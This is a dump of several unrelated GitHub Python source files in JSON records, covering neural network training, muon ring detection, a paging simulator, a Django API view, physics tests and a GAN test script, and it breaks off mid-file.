tf.nn.dynamic_rnn(multi_cell, X, dtype=tf.float32)\nprint(outputs.shape)\nfor state in states:\n print(state[0].shape, state[1].shape)\ntop_layer_h_state = states[-1][1]\nlogits = tf.layers.dense(top_layer_h_state, n_outputs, name=\"softmax\")\nxentropy = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=y, logits=logits)\nloss = tf.reduce_mean(xentropy, name=\"loss\")\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\ntraining_op = optimizer.minimize(loss)\ncorrect = tf.nn.in_top_k(logits, y, 1)\naccuracy = tf.reduce_mean(tf.cast(correct, tf.float32))\n\ninit = tf.global_variables_initializer()\n\nn_epochs = 20\nbatch_size = 100\n\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nmnist = input_data.read_data_sets(\"../data/\")\nX_test = mnist.test.images.reshape((-1, n_steps, n_inputs))\ny_test = mnist.test.labels\n\nwith tf.Session() as sess:\n init.run()\n for epoch in range(n_epochs):\n for iteration in range(mnist.train.num_examples // batch_size):\n X_batch, y_batch = mnist.train.next_batch(batch_size)\n X_batch = X_batch.reshape((batch_size, n_steps, n_inputs))\n sess.run(training_op, feed_dict={X: X_batch, y: y_batch})\n acc_train = accuracy.eval(feed_dict={X: X_batch, y: y_batch})\n acc_test = accuracy.eval(feed_dict={X: X_test, y: y_test})\n print(\"Epoch\", epoch, \"Train accuracy =\", acc_train, \"Test accuracy =\", acc_test)\n","repo_name":"fancyerii/deep_learning_theory_and_practice","sub_path":"src/ch6/lstm-mnist.py","file_name":"lstm-mnist.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":130,"dataset":"github-code","pt":"61"} +{"seq_id":"71667418754","text":"import numpy as np\nfrom skimage.measure import ransac\nfrom skimage.measure import CircleModel\nfrom .tools import circle_overlapp\nfrom .tools import tight_circle_on_off_region\nfrom .tools import xy2polar\n\ndeg2rad = np.deg2rad(1)\n\n\ndef detection_with_simple_ring_fit(\n event,\n clusters,\n initial_circle_model_min_samples=3,\n initial_circle_model_residual_threshold=0.25,\n initial_circle_model_max_trails=15,\n initial_circle_model_min_photon_ratio=0.6,\n density_circle_model_residual_threshold=0.20,\n density_circle_model_min_on_off_ratio=3.5,\n density_circle_model_max_ratio_photon_inside_ring=0.25,\n min_circumference_of_muon_ring_in_field_of_view=1.5,\n max_arrival_time_stddev=5e-9,\n min_overlap_of_muon_ring_with_field_of_view=0.2,\n min_muon_ring_radius=0.45,\n max_muon_ring_radius=1.6\n):\n \"\"\"\n Detects muon events.\n A dictionary of muon relevant features is returned.\n\n Parameter\n ---------\n\n event FACT event.\n\n clusters Photons-stream cluster of the event.\n \"\"\"\n initial_circle_model_residual_threshold *= deg2rad\n density_circle_model_residual_threshold *= deg2rad\n min_muon_ring_radius *= deg2rad\n max_muon_ring_radius *= deg2rad\n min_circumference_of_muon_ring_in_field_of_view *= deg2rad\n\n ret = {}\n ret['is_muon'] = False\n\n field_of_view_radius = event.photon_stream.geometry.fov_radius\n\n full_cluster_mask = clusters.labels >= 0\n number_of_photons = full_cluster_mask.sum()\n\n ret['number_of_photons'] = number_of_photons\n if number_of_photons < initial_circle_model_min_samples:\n return ret\n\n flat_photon_stream = clusters.point_cloud\n full_clusters_fps = flat_photon_stream[full_cluster_mask]\n\n with np.errstate(invalid='ignore'):\n circle_model, inliers = ransac(\n data=full_clusters_fps[:, 0:2], # only cx and cy not the time\n model_class=CircleModel,\n min_samples=initial_circle_model_min_samples,\n residual_threshold=initial_circle_model_residual_threshold,\n max_trials=initial_circle_model_max_trails)\n\n cx = circle_model.params[0]\n cy = circle_model.params[1]\n r = circle_model.params[2]\n\n ret['muon_ring_cx'] = cx\n ret['muon_ring_cy'] = cy\n ret['muon_ring_r'] = r\n\n if r < min_muon_ring_radius or r > max_muon_ring_radius:\n return ret\n\n muon_ring_overlapp_with_field_of_view = circle_overlapp(\n cx1=0.0,\n cy1=0.0,\n r1=field_of_view_radius,\n cx2=cx,\n cy2=cy,\n r2=r)\n\n ret['muon_ring_overlapp_with_field_of_view'] = (\n muon_ring_overlapp_with_field_of_view\n )\n if (\n muon_ring_overlapp_with_field_of_view <\n min_overlap_of_muon_ring_with_field_of_view\n ):\n return ret\n\n arrival_time_stddev = full_clusters_fps[:, 2].std()\n ret['arrival_time_stddev'] = arrival_time_stddev\n if arrival_time_stddev > max_arrival_time_stddev:\n return ret\n\n ret['mean_arrival_time_muon_cluster'] = full_clusters_fps[:, 2].mean()\n\n number_of_ring_photons = inliers.sum()\n initial_circle_model_photon_ratio = (\n number_of_ring_photons/number_of_photons\n )\n ret['initial_circle_model_photon_ratio'] = (\n initial_circle_model_photon_ratio\n )\n if (\n initial_circle_model_photon_ratio <\n initial_circle_model_min_photon_ratio\n ):\n return ret\n\n visible_ring_circumfance = r*2*np.pi*muon_ring_overlapp_with_field_of_view\n ret['visible_muon_ring_circumfance'] = visible_ring_circumfance\n if (\n visible_ring_circumfance <\n min_circumference_of_muon_ring_in_field_of_view\n ):\n return ret\n\n # circle model ON/OFF ratio\n # -------------------------\n\n onoff = tight_circle_on_off_region(\n cx=cx,\n cy=cy,\n r=r,\n residual_threshold=density_circle_model_residual_threshold,\n xy=full_clusters_fps[:, 0:2])\n\n on_density = onoff['on'].sum()/onoff['area_on']\n inner_off_density = onoff['inner_off'].sum()/onoff['area_inner_off']\n outer_off_density = onoff['outer_off'].sum()/onoff['area_outer_off']\n\n off_density = (outer_off_density + inner_off_density)/2\n\n if off_density == 0:\n return ret\n\n on_off_ratio = on_density/off_density\n\n ret['density_circle_model_on_off_ratio'] = on_off_ratio\n if on_off_ratio < density_circle_model_min_on_off_ratio:\n return ret\n\n number_of_photons_inside_ring_off = onoff['inside_off'].sum()\n ratio_inside_circle = number_of_photons_inside_ring_off/number_of_photons\n ret['density_circle_model_inner_ratio'] = ratio_inside_circle\n if ratio_inside_circle > density_circle_model_max_ratio_photon_inside_ring:\n return ret\n\n # ring population\n # ----------------\n xy_relative_to_ring_center = full_clusters_fps\n xy_relative_to_ring_center[:, 0] -= cx\n xy_relative_to_ring_center[:, 1] -= cy\n\n rphi = xy2polar(xy=xy_relative_to_ring_center[:, 0:2])\n\n number_bins = 3*int(np.ceil(np.sqrt(number_of_photons)))\n phi_bin_edgeds = np.linspace(-np.pi, np.pi, number_bins)\n ring_population_hist, phi_bin_edgeds = np.histogram(\n rphi[:, 1],\n bins=phi_bin_edgeds)\n\n # phi_bin_centers = phi_bin_edgeds[: -1]\n # bin_pos_x = np.cos(phi_bin_centers)*r + cx\n # bin_pos_y = np.sin(phi_bin_centers)*r + cy\n # bins_inside_fov = (\n # np.sqrt(bin_pos_x**2 + bin_pos_y**2) <\n # field_of_view_radius\n # )\n # mean_photons = ring_population_hist[bins_inside_fov].mean()\n\n # continues ring population\n # -------------------------\n min_ring_circumfance = 2.5*deg2rad\n ring_circumfance = 2*r*np.pi\n min_ring_fraction = min_ring_circumfance/ring_circumfance\n\n if min_ring_fraction < 0.33:\n min_ring_fraction = 0.33\n\n number_of_fraction_bins = int(np.round(min_ring_fraction*number_bins))\n\n is_populated_evenly = False\n is_populated_at_all = False\n most_even_population_std = 1e99\n for i in range(ring_population_hist.shape[0]):\n section = np.take(\n ring_population_hist,\n range(i, i+number_of_fraction_bins),\n mode='wrap')\n\n if (section > 0).sum() >= 0.5*number_of_fraction_bins:\n is_populated_at_all = True\n rel_std = section.std()/section.mean()\n if rel_std < most_even_population_std:\n most_even_population_std = rel_std\n\n if is_populated_at_all and most_even_population_std < 0.8:\n is_populated_evenly = True\n\n if is_populated_evenly:\n ret['is_muon'] = True\n\n return ret\n","repo_name":"fact-project/muons","sub_path":"muons/detection_with_simple_ring_fit.py","file_name":"detection_with_simple_ring_fit.py","file_ext":"py","file_size_in_byte":6591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"46854609830","text":"import numpy as np\n\nDELIMINATOR = ' ' # 分隔符\nLASTSTEPSHOLDOUTFORTEST = 0 # 路径最后多少个是测试数据, 为0则不划分数据集\nMINLENGTHFORTRAIN = 1 # 训练集最小长度\n\ndef ReadSequentialData(DataPath):\n '''\n 读取数据,返回为 轨迹list.\n 输入:原始文件位置\n 输出:原始数据\n 全局变量:LASTSTEPSHOLDOUTFORTEST/MINLENGTHFORTRAIN\n '''\n print('读取原始数据...')\n # 获取总记录数据量\n with open(DataPath) as f:\n lines = f.readlines()\n totalLines = len(lines)\n print(\"数据总行数:%d\" % totalLines)\n\n RawTrajectories = []\n LoopCounter = 0\n\n with open(DataPath) as f:\n lines = f.readlines()\n for line in lines:\n fields = line.strip().split(DELIMINATOR)\n ## 在出租车轨迹数据中,每一行的第一个数据是出租车ID,其他为地理位置\n ## 格式如下:[Tax 1] [Position 1] [Position 2] [Position 3]...\n shipId = fields[0]\n movements = fields[1:]\n\n LoopCounter += 1\n if LoopCounter % 5000 == 0:\n print(\"当前进度:%d%%\" % (LoopCounter*100/totalLines))\n elif LoopCounter == totalLines:\n print(\"当前进度:100%\")\n\n ## 数据的预处理可以在下面添加\n\n ## 过滤噪声\n MinMovementLength = MINLENGTHFORTRAIN + LASTSTEPSHOLDOUTFORTEST\n if len(movements) < MinMovementLength:\n continue\n\n RawTrajectories.append([shipId, movements])\n return RawTrajectories, totalLines\n","repo_name":"NightGlory/DHONE","sub_path":"read_shipping.py","file_name":"read_shipping.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9527989600","text":"from __future__ import unicode_literals\n\nfrom django.core.management.base import BaseCommand\nfrom django.core import cache\n\n\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n new_cache_name = 'default'\n old_cache_name = 'insecure'\n old_key_prefix = 'register'\n new_prefix = 'register:secure'\n delete_old_keys = False\n\n old_cache = cache.caches[old_cache_name]\n new_cache = cache.caches[new_cache_name]\n\n # Use low level api to access full key name\n existing_keys = old_cache.client.get_client().keys('{}*'.format(old_key_prefix))\n for key in existing_keys:\n if new_prefix not in key:\n actual_key = old_cache.client.reverse_key(key)\n unencrypted_val = old_cache.get(actual_key)\n if new_cache.set(actual_key, unencrypted_val):\n if delete_old_keys:\n old_cache.delete(actual_key)\n","repo_name":"foundertherapy/register","sub_path":"registration/management/commands/secure_redis.py","file_name":"secure_redis.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"} +{"seq_id":"29975494668","text":"# This is an example VISAN script for the MIP_NL__2P product\n\n# Make sure to set the 'products-file directory' option in the VISAN Preferences panel to\n# a directory containing MIP_NL__2P products.\n\n# This example will then take all products it finds in this directory and\n# for these products plot the ozone profiles and geolocation\n\n\ndef run():\n\n import glob\n import wx\n\n productdir = str(wx.Config.Get().Read('DirectoryLocation/Products'))\n\n # Use glob to find all files in productdir starting with 'MIP_NL__2P'\n files = glob.glob(os.path.join(productdir, \"MIP_NL__2P*\"))\n\n if len(files) == 0:\n print((\"Could not find any MIP_NL__2P files in directory '\" + productdir + \"'\"))\n return\n\n # We ingest the ozone profile data\n # By providing a minimum value for the O3 vmr we also automatically filter out all NaN values\n data = harp.import_product(files, 'O3_volume_mixing_ratio>=0', 'species=O3')\n\n wplot(data, projection=\"Plate Caree\", pointsize=3, colortable='RedToGreen')\n plot(data, showpropertypanel=True, color=(0, 1, 0), title=\"MIP_NL__2P profile example\")\n\n\nrun()\n","repo_name":"stcorp/visan","sub_path":"visan/examples/MIP_NL__2P_location.py","file_name":"MIP_NL__2P_location.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"1289404732","text":"import sys\n\n#M\nmachineSize = int(sys.argv[1])\n#P\npageSize = int(sys.argv[2])\n#S\nprocessSize = int(sys.argv[3])\n#J\njobMix = int(sys.argv[4])\n#N\nnumRef = int(sys.argv[5])\n#R\nreplacementAlgo = sys.argv[6]\n\ndebugLevel = int(sys.argv[7])\n\n\nrandomNumbers = None\nwith open(\"random-numbers.txt\") as f:\n randomNumbers = f.readlines()\n\n# a global counter to keep track of index of random number from txt file\ncounter = 0\ndef randomOS(counter):\n num = int(randomNumbers[int(counter)])\n if debugLevel == \"11\":\n print(int(randomNumbers[int(counter)]))\n return num\n\nclass Process:\n def __init__(self, processSize, processNum):\n self.processSize = int(processSize)\n self.numFault = 0\n self.numEvict = 0\n # residence time\n self.resTime = 0\n # given on instruction\n self.nextRef = (111 * processNum) % processSize\n\n def nRef(self, A, B, C):\n global counter\n randomNum = randomOS(counter)\n counter += 1\n ratio = randomNum / 2147483648\n if ratio < A:\n self.nextRef = (self.nextRef + 1) % self.processSize\n elif ratio < A + B:\n self.nextRef = (self.nextRef - 5 + self.processSize) % self.processSize\n elif ratio < A + B + C:\n self.nextRef = (self.nextRef + 4) % self.processSize\n else:\n randomN = randomOS(counter)\n self.nextRef = randomN % self.processSize\n counter += 1\n\n\nclass FrameTable:\n\n def __init__(self, frameNum, type):\n self.frameNum = frameNum\n # algorithm type being used\n self.type = type\n self.table = []\n self.count = 0\n for i in range(int(frameNum)):\n self.table.append([])\n for p in self.table:\n p.append(0)\n p.append(0)\n p.append(0)\n p.append(0)\n\n # check page fault\n def hasFault(self, pageNum, processNum, time):\n hasF = True\n for page in self.table:\n # if page demand is in the table, then there's no fault\n if page[0] == pageNum and page[1] == processNum:\n if self.type == \"lru\":\n page[2] = time\n hasF = False\n\n return hasF\n\n def replace(self, plist, pageNum, processNum, time):\n if self.type == \"fifo\":\n # find empty frames\n emptyFrames = -1\n\n for i in range(len(self.table)):\n if self.table[i][0] == 0 and self.table[i][1] == 0:\n # store the empty frame\n emptyFrames = i\n break\n\n # evict if there's no empty frame\n if emptyFrames == -1:\n evictedFrame = self.table[0]\n evictedProcess = plist[int(evictedFrame[1]) - 1]\n resTime = int(time - evictedFrame[2])\n evictedProcess.numEvict += 1\n evictedProcess.resTime += resTime\n # hold previous values\n temp = []\n for i in range(len(self.table)):\n temp.append([])\n for i in range(len(self.table)-1):\n temp[i] = self.table[i + 1]\n # remove just the first frame\n self.table = temp\n emptyFrames = len(self.table) - 1\n\n # add new values\n self.table[emptyFrames] = [pageNum, processNum, time, time]\n\n else:\n LRUTime = int(time)\n evictedFrame = 0\n # check for frames not used, starting from highest address\n for i in range(int(self.frameNum) - 1, -1, -1):\n if self.table[i][0] == 0 and self.table[i][1] == 0:\n # empty frame found\n self.table[i] = [pageNum, processNum, time, time]\n return\n elif self.type == \"lru\" and LRUTime > self.table[i][2]:\n # index of evicted frame\n evictedFrame = i\n LRUTime = self.table[i][2]\n\n evictedProcess = None\n resTime = None\n if self.type == \"lru\":\n evictedProcess = plist[self.table[evictedFrame][1] - 1]\n resTime = time - self.table[evictedFrame][3]\n else:\n global counter\n evictedFrame = int(randomOS(counter) % int(self.frameNum))\n counter += 1\n evictedProcess = plist[self.table[int(evictedFrame)][1] - 1]\n resTime = time - self.table[evictedFrame][2]\n\n evictedProcess.numEvict += 1\n evictedProcess.resTime += resTime\n\n # add replacement to the evicted frame\n self.table[evictedFrame] = [pageNum, processNum, time, time]\n self.count += 1\n\n\ndef main():\n global machineSize\n global pageSize\n global processSize\n global jobMix\n global numRef\n global replacementAlgo\n global debugLevel\n\n print(\"The machine size is \" + str(machineSize) + \".\")\n print(\"The page size is \" + str(pageSize) + \".\")\n print(\"The process size size is \" + str(processSize) + \".\")\n print(\"The job mix number is \" + str(jobMix) + \".\")\n print(\"The number of references per process is \" + str(numRef) + \".\")\n print(\"The replacement algorithm is \" + str(replacementAlgo) + \".\")\n print(\"The level of debugging output is \" + str(debugLevel) + \".\")\n\n quantum = 3\n totalFault = 0\n totalEvict = 0\n totalRes = 0\n A = []\n B = []\n C = []\n maxIteration = int(int(numRef) / int(quantum))\n frameNum = int(machineSize / pageSize)\n frameTable = FrameTable(frameNum, replacementAlgo)\n\n if jobMix == 1:\n plist = []\n plist.append(Process(processSize, 1))\n for i in range(numRef):\n pageNumber = int(plist[0].nextRef / pageSize)\n if frameTable.hasFault(pageNumber, 1, i+1):\n frameTable.replace(plist, pageNumber, 1, i+1)\n plist[0].numFault += 1\n plist[0].nRef(1, 0, 0)\n else:\n plist = []\n for i in range(4):\n plist.append([])\n plist[i] = Process(processSize, i+1)\n\n # given values in the instruction\n if jobMix == 2:\n A = [1, 1, 1, 1]\n B = [0, 0, 0, 0]\n C = [0, 0, 0, 0]\n\n elif jobMix == 3:\n A = [0, 0, 0, 0]\n B = [0, 0, 0, 0]\n C = [0, 0, 0, 0]\n\n elif jobMix == 4:\n A = [0.75, 0.75, 0.75, 0.5]\n B = [0.25, 0, 0.125, 0.125]\n C = [0, 0.25, 0.125, 0.125]\n\n count = None\n for i in range(maxIteration + 1):\n for j in range(4):\n # check for final iteration\n if i == maxIteration:\n count = numRef % quantum\n else:\n count = quantum\n for k in range(count):\n pageNumber = int(plist[j].nextRef / pageSize)\n time = (quantum * i * 4) + k + 1 + (j * count)\n if frameTable.hasFault(pageNumber, j+1, time):\n frameTable.replace(plist, pageNumber, j + 1, time)\n plist[j].numFault += 1\n plist[j].nRef(A[j], B[j], C[j])\n\n indexTrack = 1\n\n for p in plist:\n if p.numEvict == 0:\n print(\"Process \", indexTrack, \" had \", p.numFault, \" faults.\")\n print(\"\\tWith no evictions, the average residence is undefined.\")\n else:\n print(\"Process \", indexTrack, \" had \", p.numFault, \" faults and \", p.resTime/p.numEvict, \" average residency.\")\n\n totalFault += p.numFault\n totalRes += p.resTime\n totalEvict += p.numEvict\n indexTrack += 1\n\n if totalEvict == 0:\n print(\"The total number of faults is \", totalFault, \".\")\n print(\"\\tWith no evictions, the overall average residency is undefined.\")\n else:\n print(\"The total number of faults is \", totalFault, \" and the overall average residency is \", totalRes/totalEvict, \".\")\n\n\nmain()\n","repo_name":"MKagesawa/demandPaging","sub_path":"demandPaging.py","file_name":"demandPaging.py","file_ext":"py","file_size_in_byte":8074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25935666182","text":"import torch\nimport torch.nn as nn\nimport torchvision\nimport torchvision.transforms as transforms\nimport numpy as np\nfrom Dataset import createDataset\nfrom Network import Generator, Discriminator\nfrom Loss import LossGenerator, LossDiscriminator\nimport argparse\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\nimport pickle\nimport os\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='''Show the output of trained TP-GAN on the input images.\n Input is not sanitized, please be nice. ''')\n parser.add_argument('-l', '--img-list', type=str, default='image_list_reduced.yml', help='yaml file of input processed input images')\n parser.add_argument('-d', '--img-dir', type=str, default='put_cleaned', help='directory of processed input images')\n parser.add_argument('-m', '--model', type=str, default='model_generator_20.pth', help='path to generator checkpoint')\n parser.add_argument('-o', '--output', type=str, default='image.png', help='path to save image output')\n parser.add_argument('-c', action='store_true', default=False, help='cpu only (no cuda)')\n\n args = parser.parse_args()\n return args\n\nif __name__ == \"__main__\":\n\n args = parse_args()\n\n print('Starting...')\n\n _, testSet = createDataset(args.img_list, args.img_dir, 1)\n testloader = torch.utils.data.DataLoader(testSet, batch_size = 1, shuffle = False, num_workers = 1, pin_memory = True)\n\n print('Dataset initialized')\n if not(args.c):\n device = torch.device('cuda')\n else:\n device = torch.device('cpu')\n\n if args.c:\n G = Generator(noise_dim = 64, num_classes = 100)\n G.load_state_dict(torch.load(args.model))\n else:\n G = torch.nn.DataParallel(Generator(noise_dim = 64, num_classes = 100)).to(device)\n G.module.load_state_dict(torch.load(args.model))\n \n print('Network created')\n\n \n\n print('Finished loading checkpoints')\n\n G.eval()\n\n img_list = list()\n toPIL = transforms.ToPILImage()\n \n\n for batch in tqdm(testloader):\n \n noise = torch.FloatTensor(np.random.normal(0,0.02,(len(batch['img128']), 64))).to(device)\n img128_fake, img64_fake, img32_fake, encoder_predict, local_fake, left_eye_fake, right_eye_fake, nose_fake, mouth_fake, local_GT = \\\n G(batch['img128'], batch['img64'], batch['img32'], batch['left_eye'], batch['right_eye'], batch['nose'], batch['mouth'], noise)\n\n img_list.append({'input': toPIL(batch['img128'].detach().cpu().reshape(*batch['img128'].shape[1:])), \n 'fake': toPIL(img128_fake.detach().cpu().reshape(*img128_fake.shape[1:])), \n 'GT': toPIL(batch['img128GT'].detach().cpu().reshape(*batch['img128GT'].shape[1:])), \n 'local': toPIL(local_fake.detach().cpu().reshape(*local_fake.shape[1:]))})\n\n \n columns = 4\n rows = min(10, len(img_list))\n fig=plt.figure(figsize=(16, 4 * rows))\n for i in range(rows):\n images = img_list[i]\n img = images['input']\n fig.add_subplot(rows, columns, 1 + 4*i)\n plt.imshow(img)\n img = images['fake']\n fig.add_subplot(rows, columns, 2 + 4*i)\n plt.imshow(img)\n img = images['local']\n fig.add_subplot(rows, columns, 3 + 4*i)\n plt.imshow(img)\n img = images['GT']\n fig.add_subplot(rows, columns, 4 + 4*i)\n plt.imshow(img)\n plt.tight_layout()\n if args.output != '':\n try:\n fig.savefig(args.output)\n except Exception as e:\n print(\"Couldn't save figure : {}\".format(e))\n plt.show()","repo_name":"UnrealLink/TP-GAN","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3661,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"61"} +{"seq_id":"70549118274","text":"def f(n, last):\n if n <= last:\n if n == nums[2] or n == nums[3]:\n return n\n else:\n a = f(n*2, last)\n b = f(n*2+1, last)\n if a != 0 and b != 0:\n return n\n else:\n return max(a, b)\n return 0\ndef height(n):\n p = n\n cnt = 0\n cnt2 = 0\n c1 = ch1[p]\n while c1 != 0:\n cnt += 1\n p = c1\n p = n\n c2 = ch2[p]\n while c2 != 0:\n cnt2 += 1\n p = c2\n return max(cnt, cnt2)\nT = int(input())\nfor tc in range(1, T+1):\n nums = list(map(int, input().split()))\n V = nums[0]\n E = nums[1]\n nn = list(map(int, input().split()))\n ch1 = [0]*(V+1)\n ch2 = [0]*(V+1)\n tree = [0]*(V+1)\n for i in range(V-1):\n if ch1[nn[i*2]] == 0:\n ch1[nn[i*2]] = nn[i*2+1]\n else:\n ch2[nn[i * 2]] = nn[i * 2 + 1]\n for i in range(V-1):\n tree[nn[i*2]] = nn[i*2+1]\n n = f(1, V)\n ans = height(n)\n print('#{} {} {}'.format(tc, n, ans))","repo_name":"bumbum9944/bumpycharm","sub_path":"0910/공통조상.py","file_name":"공통조상.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35192012732","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 22 19:33:26 2018\n\n@author: xuyuan\n\"\"\"\nimport numpy as np\na=[1,2,3]\nb=[3,4,5]\nc=[a,b]\nc=np.array(c)\nprint(np.random.uniform(size=5))\na=np.array(a)\n\n\n#kinds={'ASW':1,'YRI':2,'ACB':3,'ESN':4,'GWD':5,'LEK':6,'MSL':7}\n#print(kinds.keys())","repo_name":"yuanXuX/CS168MINIpro","sub_path":"minipro4/p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27087949138","text":"from __future__ import print_function\n\nimport mceq_config as config\nfrom MCEq.core import MCEqRun\nimport crflux.models as pm\nimport numpy as np\n\nimport pytest\nimport sys\n\nif sys.platform.startswith(\"win\") and sys.maxsize <= 2**32:\n pytest.skip(\"Skip model test on 32-bit Windows.\", allow_module_level=True)\n\ndef format_8_digits(a_list):\n return [\"%.8e\" % member for member in a_list]\n\nconfig.debug_level = 1\nconfig.kernel_config = 'numpy'\nconfig.cuda_gpu_id = 0\nif config.has_mkl:\n config.set_mkl_threads(2)\n\n\nmceq = MCEqRun(\n interaction_model='SIBYLL23C',\n theta_deg=0.,\n primary_model=(pm.HillasGaisser2012, 'H3a'))\n\n\ndef test_config_and_file_download():\n import mceq_config as config\n import os\n # Import of config triggers data download\n assert config.mceq_db_fname in os.listdir(config.data_dir)\n\n\n\ndef test_some_angles():\n\n nmu = []\n for theta in [0., 30., 60., 90]:\n mceq.set_theta_deg(theta)\n mceq.solve()\n nmu.append(\n np.sum(\n mceq.get_solution('mu+', mag=0, integrate=True) +\n mceq.get_solution('mu-', mag=0, integrate=True)))\n assert format_8_digits(nmu), ['5.62504370e-03', '4.20479234e-03', '1.36630552e-03', '8.20255259e-06']\n\n\ndef test_switch_interaction_models():\n mlist = [\n 'DPMJETIII191',\n 'DPMJETIII306',\n 'QGSJET01C',\n 'QGSJETII03',\n 'QGSJETII04',\n 'SIBYLL21',\n 'SIBYLL23',\n 'SIBYLL23C03',\n 'SIBYLL23C',\n 'SIBYLL23CPP']\n count_part = []\n for m in mlist:\n mceq.set_interaction_model(m)\n count_part.append(len(mceq._particle_list))\n assert(count_part == [64, 64, 58, 44, 44, 48, 62, 62, 62, 62])\n\n\ndef test_single_primary():\n energies = [1e3, 1e6, 1e9, 5e10]\n nmu, nnumu, nnue = [], [], []\n mceq.set_interaction_model('SIBYLL23C')\n mceq.set_theta_deg(0.)\n for e in energies:\n mceq.set_single_primary_particle(E=e, pdg_id=2212)\n mceq.solve()\n nmu.append(\n np.sum(\n mceq.get_solution('mu+', mag=0, integrate=True) +\n mceq.get_solution('mu-', mag=0, integrate=True)))\n nnumu.append(\n np.sum(\n mceq.get_solution('numu', mag=0, integrate=True) +\n mceq.get_solution('antinumu', mag=0, integrate=True)))\n nnue.append(\n np.sum(\n mceq.get_solution('nue', mag=0, integrate=True) +\n mceq.get_solution('antinue', mag=0, integrate=True)))\n assert format_8_digits(nmu) == ['2.03134720e+01', '1.20365838e+04', '7.09254150e+06', '2.63982133e+08']\n assert format_8_digits(nnumu) == ['6.80367347e+01', '2.53158948e+04', '1.20884925e+07', '4.14935240e+08']\n assert format_8_digits(nnue) == ['2.36908717e+01', '6.91213253e+03', '2.87396649e+06', '9.27683105e+07']\n\n","repo_name":"mceq-project/MCEq","sub_path":"MCEq/tests/test_mceq.py","file_name":"test_mceq.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"1433029214","text":"\"\"\"Views from the main app\"\"\"\nimport logging\n\nfrom django.db import IntegrityError\n\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.permissions import IsAuthenticated\n\nfrom .models import CustomUser\nfrom .serializers import CustomUserBaseSerializer, CustomUserFullSerializer\nfrom .managers import UserManager\nfrom .exceptions import PasswordException, ActionForbiddenException\n\nlogger = logging.getLogger('api_crud')\n\nclass UserView(APIView):\n \"\"\"Need to be logged in to perform any HTTP request\"\"\"\n permission_classes = (IsAuthenticated,)\n\n @staticmethod\n def get(request, uuid):\n \"\"\"GET method that obtains a user from the DB.\n If user is admin or getting self info gets full data,\n otherwise will get basic data\"\"\"\n user = CustomUser.objects.get(uuid=uuid)\n\n if request.user.is_staff or user.username == request.user.username:\n serializer = CustomUserFullSerializer(user)\n else:\n serializer = CustomUserBaseSerializer(user)\n\n return Response(data=serializer.data, status=status.HTTP_200_OK)\n\n @staticmethod\n def post(request):\n \"\"\"POST method to create a new user\"\"\"\n try:\n\n user = UserManager.create_user(request)\n serializer = CustomUserFullSerializer(user)\n\n return Response(data=serializer.data, status=status.HTTP_201_CREATED)\n\n except (PasswordException, ActionForbiddenException) as message:\n return Response(data={'message': str(message)}, status=status.HTTP_400_BAD_REQUEST)\n except IntegrityError as integrity_error:\n return Response(data={'message': str(integrity_error)},\n status=status.HTTP_400_BAD_REQUEST)\n except Exception as exc:\n logger.error(str(exc))\n return Response(status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n @staticmethod\n def put(request, uuid):\n \"\"\"PUT method to update an existing user\"\"\"\n try:\n custom_user = CustomUser.objects.update_user(request, uuid)\n serializer = CustomUserFullSerializer(custom_user)\n\n return Response(data=serializer.data, status=status.HTTP_200_OK)\n except ActionForbiddenException as message:\n return Response(data={'message': str(message)}, status=status.HTTP_400_BAD_REQUEST)\n\n @staticmethod\n def delete(request, uuid):\n \"\"\"DELETE method to delete a user\"\"\"\n try:\n UserManager.delete_user(request, uuid)\n\n return Response(status=status.HTTP_204_NO_CONTENT)\n except ActionForbiddenException as message:\n return Response(data={'message': str(message)}, status=status.HTTP_400_BAD_REQUEST)\n","repo_name":"kumagaepatricio/api_crud","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2014405399","text":"from sys import stdout\nfrom collections import deque\nfrom utils.misc import INF\n\nfrom opt.solver import Solver, Plugin\n\nfrom .node import TreeNode\n\n\nclass NodeQueue(deque):\n \"\"\"\n Base class for node queue classes. This is where the tree search stores nodes for later\n exploration. The policies defining how to put and get nodes from the queue basically\n determine the exploration order of the nodes. See DFS_NodeQueue and BFS_NodeQueue for\n the simplest examples.\n \"\"\"\n def put(self, elem):\n raise NotImplementedError()\n\n def get(self):\n raise NotImplementedError()\n\n def prune(self, cutoff, is_better):\n for _ in xrange(len(self)):\n elem = self[0]\n if isinstance(elem, TreeNode):\n node = elem\n else:\n node, branch = elem\n if is_better(node.bound(), cutoff):\n self.rotate(-1)\n else:\n self.popleft()\n\n def pprint(self, start=0, n=INF, ostream=stdout):\n \"\"\"Starting from index 'start', print 'n' elements in the queue.\"\"\"\n for x in xrange(start, min(start + n, len(self))):\n 